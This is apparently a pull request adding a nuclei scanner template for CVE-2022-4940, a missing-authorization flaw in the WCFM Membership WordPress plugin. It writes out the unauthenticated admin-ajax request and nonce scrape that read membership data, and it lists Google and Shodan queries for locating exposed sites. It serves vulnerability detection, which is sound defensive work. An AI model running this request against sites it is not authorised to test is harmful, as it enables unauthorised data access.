### PR TITLE
Added CVE-2022-4940 Template

### DIFF
--- a/http/cves/2022/CVE-2022-4940.yaml
+++ b/http/cves/2022/CVE-2022-4940.yaml
@@ -1,0 +1,64 @@
+id: CVE-2022-4940
+
+info:
+  name: WCFM Membership <= 2.10.0 - Missing Authorization
+  author: 0xanis
+  severity: high
+  description: |
+    The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks true the AJAX actions: wcfm-memberships, wcfm-memberships-manage, and wcfm-memberships-settings.
+  impact: |
+    Unauthenticated attackers can view, create, and modify membership plans and settings, potentially leading to unauthorized privilege escalation and data exposure.
+  remediation: |
+    Update to WCFM Membership version 2.10.1 or later.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-membership/wcfm-membership-2100-missing-authorization
+    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-4940
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: CVE-2022-4940
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: wclovers
+    product: wc-multivendor-membership
+    framework: wordpress
+    cpe: cpe:2.3:a:wclovers:wcfm_membership:*:*:*:*:*:wordpress:*:*
+    google-query: inurl:"/wp-content/plugins/wc-multivendor-membership/"
+    shodan-query: http.html:"wc-multivendor-membership"
+  tags: cve,cve2022,wordpress,wp-plugin,wcfm,wc-multivendor-membership,auth-bypass,missing-authorization
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=wcfm_ajax_controller&controller=wcfm-memberships&wcfm_ajax_nonce={{nonce}}&length=10&start=0&draw=1
+
+    cookie-reuse: true
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        internal: true
+        group: 1
+        regex:
+          - '"wcfm_ajax_nonce":"([a-f0-9]+)"'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "\"recordsTotal\"")'
+          - 'contains(body_2, "\"recordsFiltered\"")'
+          - 'contains(body_2, "\"draw\"")'
+        condition: and


### PR DESCRIPTION
### PR Information
> [!IMPORTANT]
> Vulnerable instance details shared via email. 
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2022-4940 Template
- References:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-membership/wcfm-membership-2100-missing-authorization
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4940
### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
